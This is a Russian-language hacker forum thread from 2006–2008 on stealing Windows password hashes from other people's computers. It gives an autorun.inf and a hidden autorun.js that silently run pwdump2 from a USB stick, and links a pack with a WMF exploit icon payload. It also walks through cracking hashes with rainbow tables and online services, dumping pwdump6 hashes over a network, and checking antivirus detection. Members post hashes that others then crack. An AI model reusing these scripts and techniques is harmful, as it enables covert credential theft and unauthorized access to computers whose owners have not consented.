PDA

Просмотр полной версии : Узнаём пароли Windows за 5 секунд


Brun
15.08.2006, 13:40
Кто то прошлой недели расказывал про RainbowCrack но как то скупо и мало. И я тоже про него ничего Вам не раскажу. Потому как таких програм уже развелось.
Речь пойдёт о программе pwdump2.exe. Программка в использовании невероятно проста. Достаточно её запустить в командной строке например так :
pwdump2.exe > pass.txt
pass.txt анписал на случайно, потому как туда ушли хеши пользователей.

На канале ачата некий BAY спрашивал зачем тырить пассы у друга (я до того описывал один способов применения, придумайте свой и напишите сдесь :D ). Ладно к другу идти не будем. Едём к недругу.
Флешки стали в сей час очень популярны. Создаём на ней файл AUTORUN.INF (например) с таким содержимым :
[autorun]
OPEN=pwdump2.exe > pass.txt
ICON=pwdump2.exe
Потом чёто там переписываем (новый альбом Бритни Спис илишто.) И без радости на лице (а то спалят) идём домой.
Содержимое :
administrator:1003:5c39211ab4ae778193e28745b8bf4ba 6:e448a0e7ff51ae914a77465923486e68:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe 0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:3d26128f74c4b110d9e1cf5872a4fd4 3:b5122fd690836f3950962915ecb287ce:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b514 04ee:cd01cba60848faf3204a0389d1ac9ef3:::
VUSR_PZ1418:1004:c249e29af807bb32f6c000cbbff0ab93: 19c11662fabc4372d38e06edab8c1ec5:::
Наша жертва например administrator. Копируем хеш 5c39211ab4ae778193e28745b8bf4ba6:e448a0e7ff51ae914 a77465923486e68
и заходим на страничку : http://lasecwww.epfl.ch/~oechslin/projects/ophcrack/
и там где пишет hash: вставляем наш хеш. Жмём Submit hash. Ждёмс около 5-10 секунд. И вот он пароль.
Так же можно проверить свой пароль если ввести его в поле password:, нам выдаст хеш. Потом пробуем назад. Но єтот онлайн скрипт имеет не большую базу. А её то можно скачать по ссылкам :
SSTIC04-10k (388MB), for PCs with at least 256MB of RAM (http://lasecwww.epfl.ch/SSTIC04-10k.zip)
SSTIC04-5k (720MB), for PCs with at least 512MB of RAM. (http://lasecwww.epfl.ch/SSTIC04-5k.zip)
Вообщем всё это читаете на том же сайте.

Ах да. Где я взял pwdump2.exe? Если чесно то в гугле. Но если комуто тяжело искать то берите откуда брял я : http://www.doubleupsoftware.com/files/pwdump2.zip

На этом и буду процатся.
З.Ы. Это моя первая такого рода статья. Интересно Ваше мнение по поводу написания.

Elekt
15.08.2006, 18:04
На сколько мне известно, флеш не автозапускается из авторана, как сд. И говорили об этом уже не один раз.
Единственно, что из авторана считывается иконка. А иконка, это картинка. А в картинках можно организовать переполнение буфера аля WMF. Или ещё одно переполнение в .bmp
Кстати, нашли ещё одну дыру в WMF, правда там только дос. Проводник или любое другое кэширующе\воспроизводящая прога красиво падает в даун :)

И вообще. pwdump разработали в 2000 году. А в каком году ХР вышло ? Не подскажите?
Будем надеется, что у другана win2000 или NT.

Brun
15.08.2006, 18:29
по тексту читаем :
pwdump2.exe
Работает на ХР и 2003 серваке отлично. Проверенно. А вот чесно скажу на 2000 и НТ не проверял, поскоку небыло под руками.

Elekt
15.08.2006, 19:12
Ок! хрюша прошла тест :) Извиняюсь, просто как то не верилось, да и помнится мне старая версия дампа.
Правда мой 10символьник сайт не разгодал :))
Читанул сайтец. Интересная консольная альтернатива.

2003 отказалась.

Но с флешкой не прокатит просто так. это 100%
Неоднократно проверял. С неё и загрузить операционку трудно... Вобщем много там заморочек.
Но говорю, можно заюзать фичу с картинкой. Читаем статьи лебеда про метасплоит.

Brun
15.08.2006, 20:31
грузить операционку?... эт не то..
Это автозагрузка (как с сидюка). А её мало кто выключает (но не я конечно). Так что вариант.

hidden
15.08.2006, 20:38
Но с флешкой не прокатит просто так. это 100%
Юзал подобную фишку. В autorun.inf нужно написать

[autorun]
ICON=icon.ico
OPEN=wscript autorun.js
ACTION=Take no action

Выдрать у shell32'a иконку
создать файл autorun.js

var WshShell = new ActiveXObject("WScript.Shell");
var oExec = WshShell.Run('cmd /C "xxx\\progs\\PassRecovery\\pwdump2\\pwdump2.exe>>pass.txt"',0);

И всё работает наура, только после вставки флэшки, остаётся нажать Enter, на якомы "Ничего не делать" ;)
Да, и ещё сделать их все скрытыми и системными :)
Статья неплохая, держи +2

slider
03.09.2006, 16:38
Предотвращение выполнения данных — Microsoft Windows
LSA Shell (Export Version)
Закрыть сообщение

Хех... сработала защитп =)
Windows XP MC 2005 рулид =)
За статью + !

Dennie
16.09.2006, 15:07
А есть ли какая нибудь программа для расшифровки хешей? А то каждый раз на сайл бродить неудобно ;)

NIGHT_WOLF
16.09.2006, 20:35
А у меня вот что то тема с флэшкой не канает...
вроде всё сделал как hidden написал но всё равно не выходит.

hidden
16.09.2006, 20:41
А у меня вот что то тема с флэшкой не канает...
вроде всё сделал как hidden написал но всё равно не выходит.
Так а что хоть не получилось? Когда на скрипт нажимаешь, пароль сохраняется?

NIGHT_WOLF
16.09.2006, 20:44
Создаётся pass.txt но без хэшэй... пустой.
Это если на autorun.js жать, а так флэшка сама не запускается.

hidden
16.09.2006, 20:49
xxx\\progs\\PassRecovery\\pwdump2\\pwdump2.exe(G:\ xxx\progs\PassRecovery\pwdump2\pwdump2.exe) - это относительный путь к этой програме на моей флешке, укажи куда ты её положил на своей флешке.

NIGHT_WOLF
16.09.2006, 20:59
я кинул сюда
F:\xxx\progs\PassRecovery\pwdump2
тоесть путь такой же как и у тебя...
в прошлый раз пропустил xxx сейчас исправил, и при нажатии на autoran.js даже pass.txt не создаётся.

hidden
16.09.2006, 21:45
Тогда осталось только два варианта:
1) У тебя стоит антивирус, фаервол или ещё какаянибудь ерунда, которая успешно блокирует эту прогу.
2) У тебя что-то не так с виндой.

Тем не мение, попробуй выполнить эту прогу через командную строку, если заработает, значит проблема в твоём интерпритаторе javascript'a иначе в проге.

ProTeuS
16.09.2006, 23:48
А есть ли какая нибудь программа для расшифровки хешей? А то каждый раз на сайл бродить неудобно [quote]

мда, о4ень корректная постановка вопроса

fornax
17.09.2006, 00:42
Со флешки НЕ ЗАПУСКАЕТСЯ!!! Сколько пробовал, всеравно!

bul.666
17.09.2006, 05:32
=)))))))) Держи крестик =)

А вот мой способ качаем прогу Sam Imside... Устанаваливаем на флешку... Идем к "другу"... Туды Суды... Говоришь иму поставь чайник... Или "иди поставь, Чайник!"... Вообщем штоб он уш0л... Быстро заупускаем жмем адну кнопку, быстро запомниаем пароль и выдираем фляху... Но тут входит "друг", ловким движением пальца закидываем флеху под рукав и делаем вид, мол корпус расматриваешь, в дырке USB ковыряешься -))))

=))))))))))))))))))))))))
Тока вод нахира эти пароли нужны?

NIGHT_WOLF
17.09.2006, 05:37
Тогда осталось только два варианта:
1) У тебя стоит антивирус, фаервол или ещё какаянибудь ерунда, которая успешно блокирует эту прогу.
2) У тебя что-то не так с виндой.

Тем не мение, попробуй выполнить эту прогу через командную строку, если заработает, значит проблема в твоём интерпритаторе javascript'a иначе в проге.
Винду переустанавливал пару дней назад =)
Ни фаерволов ни антивирусников ещё не ставил.
Через командную строку всё работает.

Dennie
17.09.2006, 09:07
[quote]

мда, о4ень корректная постановка вопроса
Ну мне нужна программа для расшифровки хешей в оффлайн блин :mad:

Brun
18.09.2006, 10:28
[QUOTE=ProTeuS]
Ну мне нужна программа для расшифровки хешей в оффлайн блин :mad:
Project RainbowCrack
Сайт http://www.antsight.com/zsl/rainbowcrack/
Словари берём из первого поста. Там на 700 и 300 метров. Есть словарь на 5 гиг, но он платный. У кого есть? Кто может поделится (ссылки на торрент,....)

Собсно есть и друная прога. Читаэм тут : http://elliottback.com/wp/archives/2006/04/26/cracking-windows-passwords-with-ophcrack-and-rainbow-tables/
Словари тут : http://lasecwww.epfl.ch/~oechslin/projects/ophcrack/

Будут вопросы обращайтесь.

Dennie
18.09.2006, 16:47
То есть существуют только базы этих хешей? Сами по себе они не вычисляются, нет никакого алгоритма???

SK | Heaton
26.09.2006, 15:13
я кинул сюда
F:\xxx\progs\PassRecovery\pwdump2
тоесть путь такой же как и у тебя...
в прошлый раз пропустил xxx сейчас исправил, и при нажатии на autoran.js даже pass.txt не создаётся.

легче создать батник с записью

pwdump2.exe > pass.txt =))

hidden
26.09.2006, 17:49
легче создать батник с записью

pwdump2.exe > pass.txt =))
А ты думаешь, почему я батник не предложил создать, если это легче? ;)
До потому-что в js можно подавить открытие посторонних окон, на которые обратит внимание каждый, даже тот кто сидит за компом первый раз.

SK | Heaton
27.09.2006, 07:28
А ты думаешь, почему я батник не предложил создать, если это легче? ;)
До потому-что в js можно подавить открытие посторонних окон, на которые обратит внимание каждый, даже тот кто сидит за компом первый раз.
тут говорится запустить одному, то есть отправить хоз. компа приготовить чай и самому запустить. ну вот и предложил, если сам запустишь я думаю ничего такгого нет увидеть на 1 сек окошка эмуляции дОс =)

zdimonz
29.09.2006, 02:31
"failed to open Lsass: 5. Exiting."
...ет типа зашита сработала ? а мож её както обойти ????

Brun
29.09.2006, 09:23
Пробуй другие версии pwdump. Ищи в гугле, или иди сюда : http://www.openwall.com/passwords/microsoft-windows-nt-2000-xp-2003
или сдесь http://www.foofus.net/fizzgig/pwdump/
Удачи.

Brun
23.10.2006, 18:09
Недавно сказали что pwdump2 палится симантеком.
В таком случае идём http://www.foofus.net/fizzgig/pwdump/
Качаем версию pwdump6 1.4.1 (ZIP format) (9/22/2006)
В даной версии предусмотрено тырять пароли по сетке (не буду повторятся и говорить что и в этом случае нужны права админа на пару сек).
Параметр запуска следующий :
pwdump -o 1.txt server
в файле 1.txt будут лежать наши хеши.

А насчёт вирусов. Проверял 23-ма антивирусами (http://www.virustotal.com/en/indexf.html). И только
Fortinet 2.82.0.0 10.23.2006 HackerTool/Pwdump
McAfee 4878 10.20.2006 potentially unwanted program PWCrack-Pwdump
Panda 9.0.0.4 10.22.2006 Suspicious file
написали. А все другие твердили no virus found.
И на файл LsaExt.dll проматюкался токо
McAfee 4878 10.20.2006 potentially unwanted program PWCrack-Pwdump

Что делать дальше думайте сами.
З.Ы. Потому как сам админ, и если ктото меня знает в реале, и читал это, то не пробуйте сделать это у меня, а то обижусь, а потом чтото поотрываю.

belodonna
16.03.2007, 13:14
нет! ну помогите хоть кто из хеша пароль получит !!! с прогой что указана в первом посту ни как не получается - т.е. из пароля хеш делает, а наоборот ни как ??????

Hana
16.03.2007, 21:46
Для этого и придуман хеш - чтобы его нельзя было обратно превратить в пароль.
Используй брут. По ЛМ хешу за день можно "открыть" пароль приличной сложности.

Эта прога без прав админа конечно же не пашет?

WEB'er
21.03.2007, 21:27
А как имея доступ гостя узнать пароль админа?? Я так понял, что из этой статьи никак??

iv.
22.03.2007, 01:19
А как имея доступ гостя узнать пароль админа?? Я так понял, что из этой статьи никак??
имея доступ гостя можно свои права повысить ;)
а так навряд ли

походу вопрос: господа, простите, а кто мешает взять sam из %windir%\repair ? насколько часто он там обновляется?

x-treem
22.03.2007, 09:28
а кто нить знает, где физически хранятся пассы на интернет и как их расшифровать?

Prod
22.03.2007, 09:47
Если комп в домене, как узнать админский пароль?

iv.
22.03.2007, 10:18
а кто нить знает, где физически хранятся пассы на интернет и как их расшифровать?
физически - обычно на жестком диске пользователя ;)
по поводу расшифровки - гуглить запрос "расшифровка sam файла", либо использовать здешний поиск.
Если комп в домене, как узнать админский пароль?
видимо нужен доступ к контроллеру домена.

x-treem
22.03.2007, 10:41
Пасы на нет хранятся в sam??? Как - же тогда их пинчег расшифровывает моментом?
Мне кажется они в реестре... ток вот где

iv.
22.03.2007, 10:52
ступил \= конечно не в sam, это меня уже к утру подкашивает на тему sam \=
насчет инета(если юзер пользуется стандартной звонилкой) - хз, но то что они зашифрованы - 100%

-=lebed=-
22.03.2007, 11:37
ступил \= конечно не в sam, это меня уже к утру подкашивает на тему sam \=
насчет инета(если юзер пользуется стандартной звонилкой) - хз, но то что они зашифрованы - 100%

DialUp-ные пароли можно достать dialupass`ом (http://lebed.ucoz.ru/soft/dialupass.zip)

x-treem
22.03.2007, 15:53
да пох чем их достать. вот где они хранятся... вопрос

-=lebed=-
22.03.2007, 18:04
Ок! хрюша прошла тест :) Извиняюсь, просто как то не верилось, да и помнится мне старая версия дампа.
Правда мой 10символьник сайт не разгодал :))
Читанул сайтец. Интересная консольная альтернатива.

2003 отказалась.

Но с флешкой не прокатит просто так. это 100%
Неоднократно проверял. С неё и загрузить операционку трудно... Вобщем много там заморочек.
Но говорю, можно заюзать фичу с картинкой. Читаем статьи лебеда про метасплоит.

Вот сделал по идее Elekt`a. Используется уязвимость WMF, распакуйте содержимое архива на флешку. Там два файла icon.ico - WMF-сплоит с начинкой win32_exec (set CMD start.exe) и start.exe (не бойтесь - это не вирь, а Starter - полезная тулза). Если глянуть свойства иконки он запустится, а иногда достаточно только вставить флеху и запустится. Вы можете заменить start.exe чем хотите (главное чтоб имя было такое же). скачать набор ;-) (http://lebed.ucoz.ru/soft/pack.zip)
autorun.inf - сами добавите если надо...

P.S. Проверено на Win 2003 server SP1 и Win XP SP2 (без заплаток и антивиря) - пашет как часы... пользуйтесь ;-)
Кто будет тестить, отпишитесь... получилось или нет. При скачке архива антивирь тормознёт архив - пропустите (сплоит wmf "icon.ico" - уже давольно старый - естественно палица и есть во многих базах)

lamersfear
22.03.2007, 20:12
Ребя, у меня кароче такая ситуация.

Есть компьютер (к которому имеется доступ) Виндовс ХР, ограниченная учетная запись, ничего на компе инсталлировать нельзя.

Вопрос: как узнать администраторский пароль?

Предпринимались различные попытки, например кейлоггер. Но все обламывалось на корню т.к. все логгеры, какие я нашел, инсталлились, а у меня таких прав нет. Я что-то слышал насчет Fucklogon'a и Logoner'a (которые перехватывают ввод пароля в окне входа в винду) если можете, то опишите работу этих прог.

Также пробовал расшифровать пароль. Но так как пароль там примерно 11 символов с цифрами и буквами, а времени мало, этот метод был откинут. (SAMinside был упомянут выше, но пароль он подбирает отнюдь не за секунды...)

Но вот после этой статьи появилась надежда =) Собственно хочеться узнать каким способом можно утащить админский пароль? Реально ли в огр. уч. записи вытащить дамп на флешку и дома расшифровать? Также в сети есть комп на котором я имею админский доступ, могу ли я по сетке утащить дамп? Никаких вроде доменов и.т.п в сети нет...

Вобщем жду помощи и любых советов! Надеюсь на помощь! =)

belodonna
02.04.2007, 19:26
Товарищи!!! Мне с большим трудом удалось выцепить хешики!!! НО!!! расшифровать ни как не выходит!!! Может кто поможет у кого словари есть или ещё что-либо!!!

буду очень признателен и готов вознаградить за успешную работу :)

LM-hash: D4EE55BFF1FB8417AAD3B435B51404EE
NT-hash: 336DB528B6613CDD594F0BA0DBC5216A

логин: master

(латиница, цифры и спец-символы) всего 7 вроде как :)

lsedl
11.04.2007, 20:59
Товарищи!!! Мне с большим трудом удалось выцепить хешики!!! НО!!! расшифровать ни как не выходит!!! Может кто поможет у кого словари есть или ещё что-либо!!!

буду очень признателен и готов вознаградить за успешную работу :)

LM-hash: D4EE55BFF1FB8417AAD3B435B51404EE
NT-hash: 336DB528B6613CDD594F0BA0DBC5216A

логин: master

(латиница, цифры и спец-символы) всего 7 вроде как :)


поздновато канешно но все ж мож пригодится....
пароль - kolya21

вообще, ежли кому с расшифровкой sam помочь надоть-обращайтесь)

hidden
11.01.2008, 23:14
Выдрать у shell32'a иконкуЯ надеялся, выполнение этой задачи, не составит труда у тех, кто соберается это реализовывать))
Это можно сдалать многими способами:
Resource browser - plugin для Far manager (Чем я и воспользовался)
XNResourceEditor
wcres - plugin для Total Commander

http://en.wikipedia.org/wiki/Pwdump - Тут можно скачать вареации pwdump'a

Lorenc
14.01.2008, 18:17
а мне можете помочь???
LM-хеш 436E21BDF72262A390004151ADA7B438
NT-хеш CF346B2CE703E18372C806A444F62DFB

EveryonE
15.12.2008, 02:42
а мне можете помочь???
LM-хеш 436E21BDF72262A390004151ADA7B438
NT-хеш CF346B2CE703E18372C806A444F62DFB

по пути подобрал :)

T658<jG*